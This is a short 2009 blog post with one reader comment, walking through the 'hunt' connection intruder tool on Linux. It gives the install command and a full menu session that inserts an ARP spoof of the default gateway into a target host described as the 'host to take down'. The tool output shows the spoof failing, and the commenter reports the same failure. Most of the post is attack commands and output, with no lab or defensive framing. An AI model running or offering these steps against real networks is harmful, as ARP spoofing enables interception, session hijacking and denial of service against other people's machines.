A Blog about technology, linux, peer2peer, cool new downloads and software development.

Monday, May 25, 2009

ip takeover attack with hunt to arp spoof


$ sudo apt-get install hunt


$ sudo hunt
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
-> d
--- daemons --- rcvpkt 148, free/alloc 63/64 ------
r) reset daemon
a) arp spoof + arp relayer daemon
s) sniff daemon
m) mac discovery daemon
x) return
-dm> a
--- arpspoof daemon --- rcvpkt 250, free/alloc 63/64 ------
s/k) start/stop relayer daemon
l/L) list arp spoof database
a) add host to host arp spoof i/I) insert single/range arp spoof
d) delete host to host arp spoof r/R) remove single/range arp spoof
t/T) test if arp spoof successed y) relay database
x) return
-arps> i
host to spoof> 10.1.1.253 # DEFAULT GATEWAY IP ADDRESS
fake mac [EA:1A:DE:AD:BE:01]> # RANDOM MAC ADDR, DEFAULT OK
target - where to insert the spoof> 10.1.1.48 # IP OF HOST TO TAKE DOWN
refresh interval sec [0]> 1
ARP spoof of 10.1.1.253 with fake mac EA:1A:DE:AD:BE:01 in host 10.1.1.48 FAILED
do you want to force arp spoof until successed y/n [y]> y
CTRL-C to break
....^C

1 comment:

lyonn said...

Hi

My name y Rodrigo and I try use Hun, but when I follow your same steps Hun launch the message:

ARP spoof of 192.168.1.254 with fake mac EA:1A:DE:AD:BE:01 in host 192.168.1.67 FAILED

Other message show when I try list the topic "arp/simple hijack (avoids ack storm if arp used)" Hunt show me:

no connections are available

Thanks for your help